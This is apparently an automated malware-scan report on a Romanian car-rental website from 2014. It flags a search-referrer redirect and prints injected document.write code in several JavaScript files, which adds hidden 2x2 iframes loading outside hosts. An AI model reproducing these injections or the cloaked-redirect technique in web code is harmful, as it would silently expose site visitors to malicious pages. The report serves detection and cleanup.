Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.innercity.ro/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.innercity.ro Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 19 Sep 2014 03:12:24 GMT Location: http://aklmn.com/mzod.html?h=606169 Server: Apache Vary: Accept-Encoding Content-Length: 219 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.innercity.ro/ | 200 OK Content-Length: 14553 Content-Type: text/html | clean |
http://www.innercity.ro/js/menu.js | 200 OK Content-Length: 1005 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
function assignHoverNav() { var menu = document.getElementById('main-nav'); if (!menu) return false; var index=0 var elems = menu.getElementsByTagName('li'); if (!elems) return false; for(index=0;index<elems.length;index++) { var li = elems[index]; li.o window.status = "Over"; } li.onmouseout = function () { window.status = "Out"; this.className=this.className.replace("over", ""); } } } if (window.attachEvent) window.attachEvent("onload", assignHoverNav); else window.onload = assignHoverNav; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> | ||
http://www.innercity.ro/js/functii.js | 200 OK Content-Length: 684 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
function schimba(img_name) { document.imagine_mare.src = img_name; } function schimba_i(img_name) { document.imagine_mare.src = img_name; } var msg; function stergeText(inName) { msg = inName.value; inName.value = ""; } function adText(inName) { msg2 = inName.value; if(msg2=="") { inName.value = msg; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> | ||
http://www.innercity.ro/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57552 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);i document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> | ||
http://www.innercity.ro/js/jquery.jcarousel.pack.js | 200 OK Content-Length: 9193 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> | ||
http://www.innercity.ro/js/carousel.js | 200 OK Content-Length: 1552 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
function mycarousel_initCallback(carousel) { carousel.buttonNext.bind('click', function() { carousel.startAuto(0); }); carousel.buttonPrev.bind('click', function() { carousel.startAuto(0); }); carousel.clip.hover(function() { carousel.stop }); jQuery('#mycarouse2').jcarousel({ auto: 4, wrap: 'last', vertical: false, scroll: 1, animation: '100', buttonNextHTML: null, buttonPrevHTML: null, initCallback: mycarousel_initCallback }); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> | ||
http://www.innercity.ro/text.php?text=3 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:27 GMT Location: http://www.innercity.ro/firma-inchirieri-auto-innercity Server: Apache Vary: Accept-Encoding Content-Length: 263 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/firma-inchirieri-auto-innercity | 200 OK Content-Length: 13081 Content-Type: text/html | clean |
http://www.innercity.ro/js/lytebox.js | 200 OK Content-Length: 39872 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
Array.prototype.removeDuplicates = function () { for (var i = 1; i < this.length; i++) { if (this[i][0] == this[i-1][0]) { this.splice(i,1); } } } Array.prototype.empty = function () { for (var i = 0; i <= this.length; i++) { this.shift(); } } String.prototype.trim = function () { return this.replace(/^\s+|\s+ } }; if (window.addEventListener) { window.addEventListener("load",initLytebox,false); } else if (window.attachEvent) { window.attachEvent("onload",initLytebox); } else { window.onload = function() {initLytebox();} } function initLytebox() { myLytebox = new LyteBox(); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> | ||
http://www.innercity.ro/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:28 GMT Location: http://www.innercity.ro/ Server: Apache Vary: Accept-Encoding Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 19 Sep 2014 03:12:28 GMT Location: http://www.innercity.ro/eroare.php Server: Apache Vary: Accept-Encoding Content-Length: 218 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/eroare.php | 200 OK Content-Length: 5751 Content-Type: text/html | clean |
http://www.innercity.ro/drivers_team.php | 200 OK Content-Length: 7978 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:29 GMT Location: http://www.innercity.ro/certificare Server: Apache Vary: Accept-Encoding Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/certificare | 200 OK Content-Length: 9526 Content-Type: text/html | clean |
http://www.innercity.ro/references.php | 200 OK Content-Length: 7122 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=5 | 200 OK Content-Length: 10381 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=6 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:30 GMT Location: http://www.innercity.ro/stiri Server: Apache Vary: Accept-Encoding Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/stiri | 200 OK Content-Length: 17124 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=7 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:31 GMT Location: http://www.innercity.ro/transfer-aeroport Server: Apache Vary: Accept-Encoding Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/transfer-aeroport | 200 OK Content-Length: 13010 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=innercity.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://innercity.ro/
Result: innercity.ro is not infected or malware details are not published yet.
Result: innercity.ro is not infected or malware details are not published yet.